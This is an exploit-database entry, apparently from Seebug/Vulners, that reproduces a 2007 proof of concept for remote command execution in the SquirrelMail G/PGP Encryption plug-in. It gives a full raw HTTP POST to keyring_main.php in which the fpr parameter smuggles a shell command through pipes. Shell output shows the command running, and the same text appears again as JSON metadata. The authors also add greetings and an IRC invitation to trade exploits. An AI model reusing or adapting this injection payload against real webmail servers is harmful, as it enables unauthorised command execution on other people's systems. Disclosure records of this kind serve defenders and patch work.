Search...

SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln

2007-07-12T00:00:00

ID SSV:7040
Type seebug
Reporter Root
Modified 2007-07-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                SquirrelMail&nbsp;G/PGP&nbsp;Encryption&nbsp;Plug-in&nbsp;Remote&nbsp;Command&nbsp;Execution&nbsp;Vulnerability

Bugtraq&nbsp;ID:&nbsp;24782

-----------------------------

There&nbsp;are&nbsp;various&nbsp;vulnerabilities&nbsp;in&nbsp;this&nbsp;software!&nbsp;One&nbsp;is&nbsp;in
keyring_main.php!
$fpr&nbsp;is&nbsp;not&nbsp;escaped&nbsp;from&nbsp;shellcommands!

testbox:/home/w00t#&nbsp;cat&nbsp;/tmp/w00t
cat:&nbsp;/tmp/w00t:&nbsp;No&nbsp;such&nbsp;file&nbsp;or&nbsp;directory
testbox:/home/w00t#

***@silverlaptop:~$&nbsp;nc&nbsp;***&nbsp;80
POST&nbsp;/webmail/plugins/gpg/modules/keyring_main.php&nbsp;HTTP/1.1
Host:&nbsp;***
User-Agent:&nbsp;w00t
Keep-Alive:&nbsp;300
Connection:&nbsp;keep-alive
Cookie:&nbsp;Authentication&nbsp;Data&nbsp;for&nbsp;SquirrelMail
Content-Type:&nbsp;application/x-www-form-urlencoded
Content-Length:&nbsp;140

id=C5B1611B8E71C***&amp;fpr=&nbsp;|&nbsp;touch&nbsp;/tmp/w00t&nbsp;|
&amp;pos=0&amp;sort=email_name&amp;desc=&amp;srch=&amp;ring=all&amp;passphrase=&amp;deletekey=true&amp;deletepair=false&amp;trust=1

...

testbox:/home/w00t#&nbsp;cat&nbsp;/tmp/w00t
testbox:/home/w00t#

So&nbsp;we&nbsp;just&nbsp;executed&nbsp;'touch&nbsp;/tmp/w00t'!

WabiSabiLabi&nbsp;tries&nbsp;to&nbsp;sell&nbsp;the&nbsp;exploit&nbsp;for&nbsp;700&nbsp;Euro!&nbsp;;)
lol&nbsp;@&nbsp;WabiSabiLabi!

Greets:

oli&nbsp;and&nbsp;all&nbsp;members&nbsp;of&nbsp;jmp-esp!


jmp-esp&nbsp;is&nbsp;looking&nbsp;for&nbsp;people&nbsp;who&nbsp;are&nbsp;interested&nbsp;in&nbsp;IT&nbsp;security!
Currently&nbsp;we&nbsp;are&nbsp;looking&nbsp;for&nbsp;people&nbsp;who&nbsp;like&nbsp;to&nbsp;write&nbsp;articles&nbsp;for&nbsp;a
German&nbsp;ezine&nbsp;or&nbsp;are&nbsp;interested&nbsp;in&nbsp;exchanging&nbsp;informations,&nbsp;exploits...

IRC:&nbsp;jmp-esp.kicks-ass.net&nbsp;/&nbsp;6667&nbsp;or&nbsp;6661&nbsp;(ssl)
&nbsp;&nbsp;&nbsp;&nbsp;#main

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-7040", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-07-12T00:00:00", "title": "SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-7040", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-07-12T00:00:00", "sourceData": "\n SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability\r\n\r\nBugtraq ID: 24782\r\n\r\n-----------------------------\r\n\r\nThere are various vulnerabilities in this software! One is in\r\nkeyring_main.php!\r\n$fpr is not escaped from shellcommands!\r\n\r\ntestbox:/home/w00t# cat /tmp/w00t\r\ncat: /tmp/w00t: No such file or directory\r\ntestbox:/home/w00t#\r\n\r\n***@silverlaptop:~$ nc *** 80\r\nPOST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1\r\nHost: ***\r\nUser-Agent: w00t\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nCookie: Authentication Data for SquirrelMail\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 140\r\n\r\nid=C5B1611B8E71C***&fpr= | touch /tmp/w00t |\r\n&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1\r\n\r\n...\r\n\r\ntestbox:/home/w00t# cat /tmp/w00t\r\ntestbox:/home/w00t#\r\n\r\nSo we just executed 'touch /tmp/w00t'!\r\n\r\nWabiSabiLabi tries to sell the exploit for 700 Euro! ;)\r\nlol @ WabiSabiLabi!\r\n\r\nGreets:\r\n\r\noli and all members of jmp-esp!\r\n\r\n\r\njmp-esp is looking for people who are interested in IT security!\r\nCurrently we are looking for people who like to write articles for a\r\nGerman ezine or are interested in exchanging informations, exploits...\r\n\r\nIRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)\r\n    #main\n ", "id": "SSV:7040", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:01:12", "reporter": "Root", "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2017-11-19T22:01:12", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:01:12", "rev": 2}, "vulnersScore": 0.9}, "references": [], "immutableFields": []}